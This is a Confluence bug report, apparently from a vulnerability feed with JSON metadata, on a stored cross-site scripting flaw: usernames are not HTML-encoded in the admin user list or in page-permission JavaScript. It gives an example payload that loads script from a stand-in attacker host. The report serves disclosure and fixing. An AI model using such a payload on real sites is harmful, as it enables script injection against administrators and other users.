ID ATLASSIAN:CONF-7615 Type atlassian Reporter jefft Modified 2017-02-17T05:35:09
Description
When signing up for an account, it is possible to enter a username like "<script src=http://drevil.com/xss>fred</script>". Confluence will accept this, and on certain pages, render it as raw HTML to the user, opening the possibility of cross-site scripting (XSS) attacks.
Two places I've spotted the raw HTML so far:
Most prominently, when an admin goes to Manage Users -> Show All Users, and the username displays in the list, the raw HTML is rendered.
When editing a page created by such a user, the togglePermissions() javascript will display it, breaking later tags:
if ($('edit-personal').checked) $('editPermission').value = "<script src=http://drevil.com/xss>fred</script>";
{"edition": 1, "title": "XSS bug: usernames not HTML-encoded in all places", "bulletinFamily": "software", "published": "2007-01-10T03:32:00", "lastseen": "2017-03-22T18:16:53", "history": [], "modified": "2017-02-17T05:35:09", "reporter": "jefft", "hash": "7f4cd9f6e83a8585a6571216199f1767a4a30c3dfc80b4a9d8996d0416ba39e2", "viewCount": 0, "href": "https://jira.atlassian.com/browse/CONF-7615", "description": "When signing up for an account, it is possible to enter a username like \"<script src=http://drevil.com/xss>fred</script>\". Confluence will accept this, and on certain pages, render it as raw HTML to the user, opening the possibility of cross-site scripting (XSS) attacks.\r\n\r\nTwo places I've spotted the raw HTML so far:\r\n\r\n - Most prominently, when an admin goes to Manage Users -> Show All Users, and the username displays in the list, the raw HTML is rendered.\r\n - When editing a page created by such a user, the togglePermissions() javascript will display it, breaking later tags:\r\n\r\n if ($('edit-personal').checked) $('editPermission').value = \"<script src=http://drevil.com/xss>fred</script>\";\r\n", "affectedSoftware": [{"name": "Confluence", "version": "2.10", "operator": "lt"}, {"name": "Confluence", "version": "2.2.9", "operator": "le"}, {"name": "Confluence", "version": "2.9.1", "operator": "lt"}, {"name": "Confluence", "version": "2.3", "operator": "le"}], "type": "atlassian", "hashmap": [{"key": "affectedSoftware", "hash": "64b3d8c6121ced3cd7dd10b36d6cc205"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "8cd4821cb504d25572038ed182587d85"}, {"key": "description", "hash": "21136d59d46f816d4f76c16bf0d30b7d"}, {"key": "href", "hash": "e39d221eb4e8e169c183fe50c6f2d91c"}, {"key": "modified", "hash": "97c8fb7f294c97c5c56fd00bd91c666d"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "d9e9f2e82fc8723c413e54f5469ffc6f"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "823d87aa450bd53885362b060fc42373"}, {"key": "title", "hash": "162d45e0f6e3c263b237d92bc1a1f0dc"}, {"key": "type", "hash": "deff6b318be72040c25ff1208b1a96a2"}], "references": [], "objectVersion": "1.2", "enchantments": {"score": {"vector": "NONE", "value": 4.3}, "dependencies": {"references": [], "modified": "2017-03-22T18:16:53"}, "vulnersScore": 4.3}, "cvss": {"vector": "NONE", "score": 0.0}, "cvelist": [], "id": "ATLASSIAN:CONF-7615"}